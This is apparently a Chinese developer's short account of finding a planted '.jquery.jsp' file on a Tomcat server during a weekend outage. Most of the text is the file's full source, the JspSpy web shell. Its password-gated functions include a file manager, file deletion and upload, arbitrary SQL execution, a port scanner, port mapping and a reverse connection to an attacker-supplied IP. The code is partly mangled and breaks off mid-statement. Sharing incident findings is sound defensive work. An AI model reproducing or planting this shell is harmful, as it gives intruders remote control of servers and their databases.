入侵(暴风雨前的宁静)
下午阳光甚好,想趁着安静的周末静下心来写写代码。刚过一个小时,3点左右,客服MM找我,告知客户都在说平台登录不了(我们有专门的客户qq群)。看了下数据库连接数,正常。登录阿里云发现cpu 居高不下。客户还在等着,只好先重启tomcat。重启后平台登陆正常。本以为是用户导数据或者连接池被占用光了(这个以前出现过,也比较坑),重启下就会没事。
15分钟左右,客服MM又找我,说平台打开很慢。
我打开登录页面加载都很慢,这时候还是不知道什么问题,上阿里云看看,一看发现有攻击。
看了下攻击的访问url,是访问一个.jquery.jsp的文件。通过ftp查看到此文件有个密码,直接通过地址访问登录,这一登录不得了,网站目录全部显示在页面上,还可以进行操作,赶紧把文件当下来一份,删除掉。
<%@page pageEncoding="utf-8"%>
<%@page import ="java.io.*"%>
<%@page import ="java.util.*"%>
<%@page import ="java.util.regex.*"%>
<%@page import ="java.sql.*"%>
<%@page import ="java.lang.reflect.*"%>
<%@page import ="java.nio.charset.*"%>
<%@page import ="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import ="java.text.*"%>
<%@page import ="java.net.*"%>
<%@page import ="java.util.zip.*"%>
<%@page import ="java.util.jar.*"%>
<%@page import ="java.awt.*"%>
<%@page import ="java.awt.image.*"%>
<%@page import ="javax.imageio.*"%>
<%@page import ="java.awt.datatransfer.DataFlavor"%>
<%@page import ="java.util.prefs.Preferences"%>
<%!private static final String PW = "good";// password private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; private static final String REQUEST_CHARSET = "ISO-8859-1"; private static final String PAGE_CHARSET = "UTF-8"; private static final String CURRENT_DIR = "currentdir"; private static final String MSG = "SHOWMSG"; private static final String PORT_MAP = "PMSA"; private static final String DBO = "DBO"; private static final String SHELL_ONLINE = "SHELL_ONLINE"; private static final String ENTER = "ENTER_FILE"; private static final String ENTER_MSG = "ENTER_FILE_MSG"; private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; private static final String SESSION_O = "SESSION_O"; private static String SHELL_NAME = ""; private static String WEB_ROOT = null ; private static String SHELL_DIR = null ; public static Map ins = new HashMap(); private static boolean ISLINUX = false ; private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; private static final String BACK_HREF = " Back "; private static class MyRequest extends HttpServletRequestWrapper { public MyRequest(HttpServletRequest req) { super (req);} public String getParameter(String name) { try {String value = super .getParameter(name); if (name == null ) return null ; return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET);} catch (Exception e) { return null ;}}} private static class SpyClassLoader extends ClassLoader { public SpyClassLoader() {} public Class defineClass(String name, byte [] b) { return super .defineClass(name, b, 0, b.length - 2);}} private static class DBOperator { private Connection conn = null ; private Statement stmt = null ; private String driver; private String url; private String uid; private String pwd; public DBOperator(String driver, String url, String uid, String pwd) throws Exception { this (driver, url, uid, pwd, false );} public DBOperator(String driver, String url, String uid, String pwd, boolean connect) throws Exception {Class.forName(driver); if (connect) this .conn = DriverManager.getConnection(url, uid, pwd); this .url = url; this .driver = driver; this .uid = uid; this .pwd = pwd;} public void connect() throws Exception { this .conn = DriverManager.getConnection(url, uid, pwd);} public Object execute(String sql) throws Exception { if (isValid()) {stmt = conn.createStatement(); if (stmt.execute(sql)) { return stmt.getResultSet();} else { return "" + stmt.getUpdateCount();}} throw new Exception("Connection is inValid.");} public void closeStmt() throws Exception { if (this .stmt != null )stmt.close();} public boolean isValid() throws Exception { return conn != null && !conn.isClosed();} public void close() throws Exception { if (isValid()) {closeStmt();conn.close();}} public boolean equals(Object o) { if (o instanceof DBOperator) {DBOperator dbo = (DBOperator) o; return this .driver.equals(dbo.driver) && this .url.equals(dbo.url) && this .uid.equals(dbo.uid) && this .pwd.equals(dbo.pwd);} return false ;} public Connection getConn() { return this .conn;}} private static class StreamConnector extends Thread { private InputStream is; private OutputStream os; public StreamConnector(InputStream is, OutputStream os) { this .is = is; this .os = os;} public void run() {BufferedReader in = null ;BufferedWriter out = null ; try {in = new BufferedReader(new InputStreamReader(this .is));out = new BufferedWriter(new OutputStreamWriter(this .os)); char buffer[] = new char [8192]; int length; while ((length = in.read(buffer, 0, buffer.length)) > 0) {out.write(buffer, 0, length);out.flush();}} catch (Exception e) {} try { if (in != null )in.close(); if (out != null )out.close();} catch (Exception e) {}} public static void readFromLocal(final DataInputStream localIn, final DataOutputStream remoteOut) { new Thread(new Runnable() { public void run() { while (true ) { try { byte [] data = new byte [100]; int len = localIn.read(data); while (len != -1) {remoteOut.write(data, 0, len);len = localIn.read(data);}} catch (Exception e) { break ;}}}}).start();} public static void readFromRemote(final Socket soc, final Socket remoteSoc, final DataInputStream remoteIn, final DataOutputStream localOut) { new Thread(new Runnable() { public void run() { while (true ) { try { byte [] data = new byte [100]; int len = remoteIn.read(data); while (len != -1) {localOut.write(data, 0, len);len = remoteIn.read(data);}} catch (Exception e) { try {soc.close();remoteSoc.close();} catch (Exception ex) {} break ;}}}}).start();}} private static class EnterFile extends File { private ZipFile zf = null ; private ZipEntry entry = null ; private boolean isDirectory = false ; private String absolutePath = null ; public void setEntry(ZipEntry e) { this .entry = e;} public void setAbsolutePath(String p) { this .absolutePath = p;} public void close() throws Exception { this .zf.close();} public void setZf(String p) throws Exception { if (p.toLowerCase().endsWith(".jar")) this .zf = new JarFile(p); else this .zf = new ZipFile(p);} public EnterFile(File parent, String child) { super (parent, child);} public EnterFile(String pathname) { super (pathname);} public EnterFile(String pathname, boolean isDir) { this (pathname); this .isDirectory = isDir;} public EnterFile(String parent, String child) { super (parent, child);} public EnterFile(URI uri) { super (uri);} public boolean exists() { return new File(this .zf.getName()).exists();} public File[] listFiles() {java.util.List list = new ArrayList();java.util.List handled = new ArrayList();String currentDir = super .getPath();currentDir = currentDir.replace('\\', '/'); if (currentDir.indexOf("/") == 0) { if (currentDir.length() > 1)currentDir = currentDir.substring(1); else currentDir = "";}Enumeration e = this .zf.entries(); while (e.hasMoreElements()) {ZipEntry entry = (ZipEntry) e.nextElement();String eName = entry.getName(); if (this .zf instanceof JarFile) { if (!entry.isDirectory()) {EnterFile ef = new EnterFile(eName);ef.setEntry(entry); try {ef.setZf( this .zf.getName());} catch (Exception ex) {}list.add(ef);}} else { if (currentDir.equals("")) { // zip root directory if (eName.indexOf("/") == -1|| eName.matches("[^/]+/$")) {EnterFile ef = new EnterFile(eName.replaceAll("/", ""));handled.add(eName.replaceAll( "/", ""));ef.setEntry(entry);list.add(ef);} else { if (eName.indexOf("/") != -1) {String tmp = eName.substring(0, eName.indexOf( "/")); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {EnterFile ef = new EnterFile(tmp, true );ef.setEntry(entry);list.add(ef);handled.add(tmp);}}}} else { if (eName.startsWith(currentDir)) { if (eName.matches(currentDir + "/[^/]+/?$")) { // file. EnterFile ef = new EnterFile(eName);ef.setEntry(entry);list.add(ef); if (eName.endsWith("/")) {String tmp = eName.substring(eName.lastIndexOf( '/',eName.length() - 2));tmp = tmp.substring(1, tmp.length() - 1);handled.add(tmp);}} else { // dir try {String tmp = eName.substring(currentDir.length() + 1);tmp = tmp.substring(0, tmp.indexOf('/')); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {EnterFile ef = new EnterFile(tmp, true );ef.setAbsolutePath(currentDir + "/"+ tmp);ef.setEntry(entry);list.add(ef);handled.add(tmp);}} catch (Exception ex) {}}}}}} return (File[]) list.toArray(new File[0]);} public boolean isDirectory() { return this .entry.isDirectory() || this .isDirectory;} public String getParent() { return "";} public String getAbsolutePath() { return absolutePath != null ? absolutePath : super .getPath();} public String getName() { if (this .zf instanceof JarFile) { return this .getAbsolutePath();} else { return super .getName();}} public long lastModified() { return entry.getTime();} public boolean canRead() { return false ;} public boolean canWrite() { return false ;} public boolean canExecute() { return false ;} public long length() { return entry.getSize();}} private static class OnLineProcess { private String cmd = "first"; private Process pro; public OnLineProcess(Process p) { this .pro = p;} public void setPro(Process p) { this .pro = p;} public void setCmd(String c) { this .cmd = c;} public String getCmd() { return this .cmd;} public Process getPro() { return this .pro;} public void stop() { this .pro.destroy();}} private static class OnLineConnector extends Thread { private OnLineProcess ol = null ; private InputStream is; private OutputStream os; private String name; public OnLineConnector(InputStream is, OutputStream os, String name,OnLineProcess ol) { this .is = is; this .os = os; this .name = name; this .ol = ol;} public void run() {BufferedReader in = null ;BufferedWriter out = null ; try {in = new BufferedReader(new InputStreamReader(this .is));out = new BufferedWriter(new OutputStreamWriter(this .os)); char buffer[] = new char [128]; if (this .name.equals("exeRclientO")) { // from exe to client int length = 0; while ((length = in.read(buffer, 0, buffer.length)) > 0) {String str = new String(buffer, 0, length);str = str.replaceAll("&", "&").replaceAll("<", "<").replaceAll(">", ">");str = str.replaceAll("" + (char ) 13 + (char ) 10, ");str = str.replaceAll("\n", ");out.write(str.toCharArray(), 0, str.length());out.flush();}} else { // from client to exe while (true ) { while (this .ol.getCmd() == null ) {Thread.sleep( 500);} if (this .ol.getCmd().equals("first")) { this .ol.setCmd(null ); continue ;} this .ol.setCmd(this .ol.getCmd() + (char ) 10); char [] arr = this .ol.getCmd().toCharArray();out.write(arr, 0, arr.length);out.flush(); this .ol.setCmd(null );}}} catch (Exception e) {} try { if (in != null )in.close(); if (out != null )out.close();} catch (Exception e) {}}} private static class Table { private ArrayList rows = null ; private boolean echoTableTag = false ; public void setEchoTableTag(boolean v) { this .echoTableTag = v;} public Table() { this .rows = new ArrayList();} public void addRow(Row r) { this .rows.add(r);} public String toString() {StringBuffer html = new StringBuffer(); if (echoTableTag)html.append( " "); for (int i = 0; i < rows.size(); i++) {Row r = (Row) rows.get(i);html.append( "");ArrayList columns = r.getColumns(); for (int a = 0; a < columns.size(); a++) {Column c = (Column) columns.get(a);html.append( "");String vv = Util.htmlEncode(Util.getStr(c.getValue())); if (vv.equals(""))vv = " ";html.append(vv);html.append( " ");}html.append( " ");} if (echoTableTag)html.append( "
"
); return html.toString();} public static String rs2Table(ResultSet rs, String sep,
boolean op) throws Exception {StringBuffer table =
new StringBuffer();ResultSetMetaData meta =
rs.getMetaData(); int count =
meta.getColumnCount(); if (!
op)table.append( "
View Struct -
View All Tables "
); else table.append( "
All Tables "
);table.append( ""
);table.append( "
"); for (int i = 1; i <= count; i++) {table.append( "" + meta.getColumnName(i) + " ");} if (op)table.append( " ");table.append( " "); while (rs.next()) {String tbName = null ;table.append( ""); for (int i = 1; i <= count; i++) {String v = rs.getString(i); if (i == 3)tbName = v;table.append( "" + Util.null2Nbsp(v) + " ");} if (op)table.append( " tbName+ "')\">View | tbName+ "'})\">Struct | tbName+ "'})\">Export | Save To File ");table.append( " ");}table.append( "
"
); return table.toString();}} private static class Row { private ArrayList cols =
null ; public Row() { this .cols =
new ArrayList();} public void addColumn(Column n) { this .cols.add(n);} public ArrayList getColumns() { return this .cols;}} private static class Column { private String value; public Column(String v) { this .value =
v;} public String getValue() { return this .value;}} private static class Util { public static boolean isEmpty(String s) { return s ==
null || s.trim().equals(""
);} public static boolean isEmpty(Object o) { return o ==
null ||
isEmpty(o.toString());} public static String getSize(
long size,
char danwei) { if (danwei == 'M'
) { double v = formatNumber(size / 1024.0 / 1024.0, 2
); if (v > 1024
) { return getSize(size, 'G'
);} else { return v + "M"
;}} else if (danwei == 'G'
) { return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G"
;} else if (danwei == 'K'
) { double v = formatNumber(size / 1024.0, 2
); if (v > 1024
) { return getSize(size, 'M'
);} else { return v + "K"
;}} else if (danwei == 'B'
) { if (size > 1024
) { return getSize(size, 'K'
);} else { return size + "B"
;}} return "" + 0 +
danwei;} public static boolean exists(String[] arr, String v) { for (
int i = 0; i < arr.length; i++
) { if (v.equals(arr[i])) { return true ;}} return false ;} public static double formatNumber(
double value,
int l) {NumberFormat format =
NumberFormat.getInstance();format.setMaximumFractionDigits(l);format.setGroupingUsed( false ); return new Double(format.format(value)).doubleValue();} public static boolean isInteger(String v) { if (isEmpty(v)) return false ; return v.matches("^\\d+$"
);} public static String formatDate(
long time) {SimpleDateFormat format =
new SimpleDateFormat( "yyyy-MM-dd hh:mm:ss"
); return format.format(
new java.util.Date(time));} public static String convertPath(String path) { return path !=
null ? path.replace('\\', '/') : ""
;} public static String htmlEncode(String v) { if (isEmpty(v)) return ""
; return v.replaceAll("&", "&").replaceAll("<", "<"
).replaceAll( ">", ">"
);} public static String getStr(String s) { return s ==
null ? ""
: s;} public static String null2Nbsp(String s) { if (s ==
null )s = " "
; return s;} public static String getStr(Object s) { return s ==
null ? ""
: s.toString();} public static String exec(String regex, String str,
int group) {Pattern pat =
Pattern.compile(regex);Matcher m =
pat.matcher(str); if (m.find()) return m.group(group); return null ;} public static void outMsg(Writer out, String msg)
throws Exception {outMsg(out, msg, "center"
);} public static void outMsg(Writer out, String msg, String align) throws Exception {out.write( " align+ ";font-weight:bold;margin:10px\">"+
msg + ""
);} public static String highLight(String str) {str =
str.replaceAll( "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b"
, "
$1 "
);str = str.replaceAll("\t(//.+)"
, "\t
$1 "
); return str;}} private static class UploadBean { private String fileName =
null ; private String suffix =
null ; private String savePath = ""
; private ServletInputStream sis =
null ; private OutputStream targetOutput =
null ; private byte [] b =
new byte [1024
]; public void setTargetOutput(OutputStream stream) { this .targetOutput =
stream;} public UploadBean() {} public void setSavePath(String path) { this .savePath =
path;} public String getFileName() { return this .fileName;} public void parseRequest(HttpServletRequest request)
throws IOException {sis =
request.getInputStream(); int a = 0
; int k = 0
;String s = ""
; while ((a = sis.readLine(b, 0, b.length)) != -1
) {s =
new String(b, 0
, a, PAGE_CHARSET); if ((k = s.indexOf("filename=\"")) != -1
) {s = s.substring(k + 10
);k = s.indexOf("\""
);s = s.substring(0
, k);File tF =
new File(s); if (tF.isAbsolute()) {fileName =
tF.getName();} else {fileName =
s;}k = s.lastIndexOf("."
);suffix = s.substring(k + 1
);upload();}}} private void upload()
throws IOException { try {OutputStream out =
null ; if (
this .targetOutput !=
null )out =
this .targetOutput; else out =
new FileOutputStream(
new File(savePath, fileName)); int a = 0
; int k = 0
;String s = ""
; while ((a = sis.readLine(b, 0, b.length)) != -1
) {s =
new String(b, 0
, a); if ((k = s.indexOf("Content-Type:")) != -1
) { break ;}}sis.readLine(b, 0
, b.length); while ((a = sis.readLine(b, 0, b.length)) != -1
) {s =
new String(b, 0
, a); if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45
) && (b[3] == 45) && (b[4] == 45
)) { break ;}out.write(b, 0
, a);} if (out
instanceof FileOutputStream)out.close();} catch (IOException ioe) { throw ioe;}}} %>
<%
SHELL_NAME =
request.getServletPath().substring(request.getServletPath().lastIndexOf( "/") + 1
);String myAbsolutePath =
application.getRealPath(request.getServletPath()); if (Util.isEmpty(myAbsolutePath)) {
// for weblogic SHELL_NAME =
request.getServletPath();myAbsolutePath =
new File(application.getResource("/"
).getPath() +
SHELL_NAME).toString();SHELL_NAME = request.getContextPath() +
SHELL_NAME;WEB_ROOT =
new File(application.getResource("/"
).getPath()).toString();} else {WEB_ROOT = application.getRealPath("/"
);}SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0
,myAbsolutePath.lastIndexOf(File.separator))); if (SHELL_DIR.indexOf('/') == 0
)ISLINUX =
true ; else ISLINUX =
false ; if (session.getAttribute(CURRENT_DIR) ==
null )session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR)); // request = new MyRequest(request); if (session.getAttribute(PW_SESSION_ATTRIBUTE) ==
null || !
(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {String o = request.getParameter("o"
); if (o !=
null )o =
new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET); if (o !=
null && o.equals("login"
)) {((Invoker) ins.get( "login"
)).invoke(request, response,session); return ;} else if (o !=
null && o.equals("vLogin"
)) {((Invoker) ins.get( "vLogin"
)).invoke(request, response,session); return ;} else {((Invoker) ins.get( "vLogin"
)).invoke(request, response,session); return ;}}
%>
<%!
private static interface Invoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception; public boolean doBefore(); public boolean doAfter();} private static class DefaultInvoker
implements Invoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {} public boolean doBefore() { return true ;} public boolean doAfter() { return true ;}} private static class ScriptInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( ""
);} catch (Exception e) { throw e;}}} private static class BeforeInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
JspSpy "
);} catch (Exception e) { throw e;}}} private static class AfterInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( ""
);} catch (Exception e) { throw e;}}} private static class DeleteBatchInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String files = request.getParameter("files"
); int success = 0
; int failed = 0
; if (!
Util.isEmpty(files)) {String currentDir =
JSession.getAttribute(CURRENT_DIR).toString();String[] arr = files.split(","
); for (
int i = 0; i < arr.length; i++
) {String fs =
arr[i];File f =
new File(currentDir, fs); if (f.delete())success += 1
; else failed += 1
;}}JSession.setAttribute(MSG,success + " Files Deleted
Success , "+
failed + " Files Deleted
Failed !"
);response.sendRedirect(SHELL_NAME);} catch (Exception e) { throw e;}}} private static class ClipBoardInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
"
);} catch (Exception e) { throw e;}}} private static class VPortScanInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String ip = request.getParameter("ip"
);String ports = request.getParameter("ports"
);String timeout = request.getParameter("timeout"
);String banner = request.getParameter("banner"
); if (Util.isEmpty(ip))ip = "127.0.0.1"
; if (Util.isEmpty(ports))ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"
; if (Util.isEmpty(timeout))timeout = "2"
;out.println( "
"
);} catch (Exception e) { throw e;}}} private static class PortScanInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();((Invoker) ins.get( "vPortScan"
)).invoke(request, response,JSession);out.println( "
"
);String ip = request.getParameter("ip"
);String ports = request.getParameter("ports"
);String timeout = request.getParameter("timeout"
);String banner = request.getParameter("banner"
); int iTimeout = 0
; if (Util.isEmpty(ip) ||
Util.isEmpty(ports)) return ; if (!
Util.isInteger(timeout)) {timeout = "2"
;}iTimeout =
Integer.parseInt(timeout);Map rs =
new LinkedHashMap();String[] portArr = ports.split(","
); for (
int i = 0; i < portArr.length; i++
) {String port =
portArr[i];BufferedReader r =
null ; try {Socket s =
new Socket();s.connect( new InetSocketAddress(ip, Integer.parseInt(port)), iTimeout);s.setSoTimeout(iTimeout); if (!
Util.isEmpty(banner)) {r =
new BufferedReader(
new InputStreamReader(s.getInputStream()));StringBuffer sb =
new StringBuffer();String b =
r.readLine(); while (b !=
null ) {sb.append(b + " "
); try {b =
r.readLine();} catch (Exception e) { break ;}}rs.put(port, "Open
"+ sb.toString() + " "
);r.close();} else {rs.put(port, "Open"
);}s.close();} catch (Exception e) { if (e.toString().toLowerCase().indexOf( "read timed out") != -1
) {rs.put(port, "Open
<<No Banner!>> "
); if (r !=
null )r.close();} else {rs.put(port, "Close"
);}}}out.println( ""
);Set entrySet =
rs.entrySet();Iterator it =
entrySet.iterator(); while (it.hasNext()) {Map.Entry e =
(Map.Entry) it.next();String port =
(String) e.getKey();String value =
(String) e.getValue();out.println(ip + " : " +
port + " .................................
)+ ">" + value + " "
);}out.println( ""
);} catch (Exception e) { throw e;}}} private static class VConnInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();Object obj =
JSession.getAttribute(DBO); if (obj ==
null || !
((DBOperator) obj).isValid()) {out.println( " "
);out.println( "
"
);} else {((Invoker) ins.get( "dbc"
)).invoke(request, response,JSession);}} catch (ClassCastException e) { throw e;} catch (Exception e) { throw e;}}} // DBConnect private static class DbcInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String driver = request.getParameter("driver"
);String url = request.getParameter("url"
);String uid = request.getParameter("uid"
);String pwd = request.getParameter("pwd"
);String sql = request.getParameter("sql"
);String selectDb = request.getParameter("selectDb"
); if (selectDb ==
null )selectDb = JSession.getAttribute("selectDb"
).toString(); else JSession.setAttribute( "selectDb"
, selectDb);Object dbo =
JSession.getAttribute(DBO); if (dbo ==
null || !
((DBOperator) dbo).isValid()) { if (dbo !=
null )((DBOperator) dbo).close();dbo =
new DBOperator(driver, url, uid, pwd,
true );} else { if (!Util.isEmpty(driver) && !
Util.isEmpty(url) && !
Util.isEmpty(uid)) {DBOperator oldDbo =
(DBOperator) dbo;dbo =
new DBOperator(driver, url, uid, pwd); if (!
oldDbo.equals(dbo)) {((DBOperator) oldDbo).close();((DBOperator) dbo).connect();} else {dbo =
oldDbo;}}}DBOperator Ddbo =
(DBOperator) dbo;JSession.setAttribute(DBO, Ddbo); if (!Util.isEmpty(request.getParameter("type"
)) && request.getParameter("type").equals("switch"
)) {Ddbo.getConn().setCatalog(request.getParameter( "catalog"
));}Util.outMsg(out, "Connect To DataBase Success!"
);out.println( " "
);out.println( "
"+ "");DatabaseMetaData meta = Ddbo.getConn().getMetaData();out.println( "
"
); if (Util.isEmpty(sql)) {String type = request.getParameter("type"
); if (Util.isEmpty(type) || type.equals("switch"
)) {ResultSet tbs = meta.getTables(
null ,
null ,
null ,
null );out.println(Table.rs2Table(tbs, meta.getIdentifierQuoteString(), true ));tbs.close();} else if (type.equals("struct"
)) {String tb = request.getParameter("table"
); if (Util.isEmpty(tb)) return ;ResultSet t = meta.getColumns(
null ,
null , tb,
null );out.println(Table.rs2Table(t, "",
false ));t.close();}}} catch (Exception e) {JSession.setAttribute(MSG, "
Some Error Occurred. Please Check Out the StackTrace Follow. "+
BACK_HREF); throw e;}}} private static class ExecuteSQLInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String sql = request.getParameter("sql"
);String db = request.getParameter("selectDb"
);Object dbo =
JSession.getAttribute(DBO); if (!
Util.isEmpty(sql)) { if (dbo ==
null || !
((DBOperator) dbo).isValid()) {((Invoker) ins.get( "vConn"
)).invoke(request, response,JSession); return ;} else {((Invoker) ins.get( "dbc"
)).invoke(request, response,JSession);Object obj =
((DBOperator) dbo).execute(sql); if (obj
instanceof ResultSet) {ResultSet rs =
(ResultSet) obj;ResultSetMetaData meta =
rs.getMetaData(); int colCount =
meta.getColumnCount();out.println( "
Query#0 : "+ Util.htmlEncode(sql) + " "
);out.println( "
"); for (int i = 1; i <= colCount; i++) {out.println( ""+ meta.getColumnName(i) + ""+ meta.getColumnTypeName(i) + " ");}out.println( " ");Table tb = new Table(); while (rs.next()) {Row r = new Row(); for (int i = 1; i <= colCount; i++) {String v = null ; try {v = rs.getString(i);} catch (SQLException ex) {v = "<>";}r.addColumn( new Column(v));}tb.addRow(r);}out.println(tb.toString());out.println( "
"
);rs.close();((DBOperator) dbo).closeStmt();} else {out.println( "
affected rows : "+ obj + " "
);}}} else {((Invoker) ins.get( "dbc"
)).invoke(request, response,JSession);}} catch (Exception e) { throw e;}}} private static class VLoginInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
jspspy "
);} catch (Exception e) { throw e;}}} private static class LoginInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String inputPw = request.getParameter("pw"
); if (Util.isEmpty(inputPw) || !
inputPw.equals(PW)) {((Invoker) ins.get( "vLogin"
)).invoke(request, response,JSession); return ;} else {JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw);response.sendRedirect(SHELL_NAME); return ;}} catch (Exception e) { throw e;}}} private static class MyComparator
implements Comparator { public int compare(Object obj1, Object obj2) { try { if (obj1 !=
null && obj2 !=
null ) {File f1 =
(File) obj1;File f2 =
(File) obj2; if (f1.isDirectory()) { if (f2.isDirectory()) { return f1.getName().compareTo(f2.getName());} else { return -1
;}} else { if (f2.isDirectory()) { return 1
;} else { return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase());}}} return 0
;} catch (Exception e) { return 0
;}}} private static class FileListInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String path2View =
null ;PrintWriter out =
response.getWriter();String path = request.getParameter("folder"
);String outEntry = request.getParameter("outentry"
); if (!Util.isEmpty(outEntry) && outEntry.equals("true"
)) {JSession.removeAttribute(ENTER);JSession.removeAttribute(ENTER_MSG);JSession.removeAttribute(ENTER_CURRENT_DIR);}Object enter =
JSession.getAttribute(ENTER);File file =
null ; if (!
Util.isEmpty(enter)) { if (Util.isEmpty(path)) { if (JSession.getAttribute(ENTER_CURRENT_DIR) ==
null )path = "/"
; else path =
(String) (JSession.getAttribute(ENTER_CURRENT_DIR));}file =
new EnterFile(path);((EnterFile) file).setZf((String) enter);JSession.setAttribute(ENTER_CURRENT_DIR, path);} else { if (Util.isEmpty(path))path =
JSession.getAttribute(CURRENT_DIR).toString();JSession.setAttribute(CURRENT_DIR, Util.convertPath(path));file =
new File(path);}path2View =
Util.convertPath(path); if (!
file.exists()) { throw new Exception(path + "Dont Exists !"
);}File[] list =
file.listFiles();Arrays.sort(list, new MyComparator());out.println( ""
);String cr =
null ; try {cr =
JSession.getAttribute(CURRENT_DIR).toString().substring( 0, 3
);} catch (Exception e) {cr = "/"
;}File currentRoot =
new File(cr);out.println( "
File Manager - Current disk ""+ (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath()) + "" total (unknow) "
);out.println( "
"
);out.println( "
"+ " " + "" + "" + ""+ ""
);String targetIP = request.getParameter("targetIP"
);String targetPort = request.getParameter("targetPort"
);String yourIP = request.getParameter("yourIP"
);String yourPort = request.getParameter("yourPort"
); if (Util.isEmpty(targetIP))targetIP = "127.0.0.1"
; if (Util.isEmpty(targetPort))targetPort = "3389"
; if (Util.isEmpty(yourIP))yourIP =
request.getRemoteAddr(); if (Util.isEmpty(yourPort))yourPort = "1234"
;out.println( "
"
);} catch (Exception e) { throw e;}}} // StopMapPort private static class SmpInvoker
extends DefaultInvoker { public boolean doAfter() { return true ;} public boolean doBefore() { return true ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {Object obj =
JSession.getAttribute(PORT_MAP); if (obj !=
null ) {ServerSocket server =
(ServerSocket) JSession.getAttribute(PORT_MAP);server.close();}JSession.setAttribute( "done", "Stop Success!"
);((Invoker) ins.get( "vmp"
)).invoke(request, response, JSession);} catch (Exception e) { throw e;}}} // PortBack private static class PortBackInvoker
extends DefaultInvoker { public boolean doAfter() { return true ;} public boolean doBefore() { return true ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String targetIP = request.getParameter("targetIP"
);String targetPort = request.getParameter("targetPort"
);String yourIP = request.getParameter("yourIP"
);String yourPort = request.getParameter("yourPort"
);Socket yourS =
new Socket();yourS.connect( new InetSocketAddress(yourIP, Integer.parseInt(yourPort)));Socket targetS =
new Socket();targetS.connect( new InetSocketAddress(targetIP, Integer.parseInt(targetPort)));StreamConnector.readFromLocal( new DataInputStream(targetS.getInputStream()), new DataOutputStream(yourS.getOutputStream()));StreamConnector.readFromRemote(targetS, yourS, new DataInputStream(yourS.getInputStream()), new DataOutputStream(targetS.getOutputStream()));JSession.setAttribute( "done", "Port Back Success !"
);((Invoker) ins.get( "vmp"
)).invoke(request, response, JSession);} catch (Exception e) { throw e;}}} private static class MapPortInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String localIP = request.getParameter("localIP"
);String localPort = request.getParameter("localPort"
); final String remoteIP = request.getParameter("remoteIP"
); final String remotePort = request.getParameter("remotePort"
); if (Util.isEmpty(localIP) ||
Util.isEmpty(localPort) || Util.isEmpty(remoteIP) ||
Util.isEmpty(remotePort)) return ;Object obj =
JSession.getAttribute(PORT_MAP); if (obj !=
null ) {ServerSocket s =
(ServerSocket) obj;s.close();} final ServerSocket server =
new ServerSocket();server.bind( new InetSocketAddress(localIP, Integer.parseInt(localPort)));JSession.setAttribute(PORT_MAP, server); new Thread(
new Runnable() { public void run() { while (
true ) {Socket soc =
null ;Socket remoteSoc =
null ;DataInputStream remoteIn =
null ;DataOutputStream remoteOut =
null ;DataInputStream localIn =
null ;DataOutputStream localOut =
null ; try {soc =
server.accept();remoteSoc =
new Socket();remoteSoc.connect( new InetSocketAddress(remoteIP, Integer.parseInt(remotePort)));remoteIn =
new DataInputStream(remoteSoc.getInputStream());remoteOut =
new DataOutputStream(remoteSoc.getOutputStream());localIn =
